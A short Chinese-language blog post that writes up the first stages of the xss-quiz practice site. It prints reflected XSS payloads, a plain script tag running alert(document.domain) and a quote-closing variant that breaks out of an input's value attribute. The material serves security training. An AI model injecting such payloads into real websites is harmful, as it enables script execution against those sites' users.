Chybeta

xss-quiz-writeup

xss-quiz: http://xss-quiz.int21h.jp/

Stage 1

payload:

1
<script>alert(document.domain)</script>

Stage 2

http://xss-quiz.int21h.jp/stage2.php

尝试如下payload:

1
<script>alert(document.domain)</script>

无反应,查看源代码:

需要闭合前面value的双引号,所以最后payload如下:

1
"><script>alert(document.domain)</script>"

Stage 3

http://xss-quiz.int21h.jp/stage-3.php

多了一个选择country的功能。

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:xss-quiz-writeup

文章作者:chybeta

发布时间:2017年06月25日 - 19:06

最后更新:2017年07月28日 - 15:07

原始链接:http://chybeta.github.io/2017/06/25/xss-quiz-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。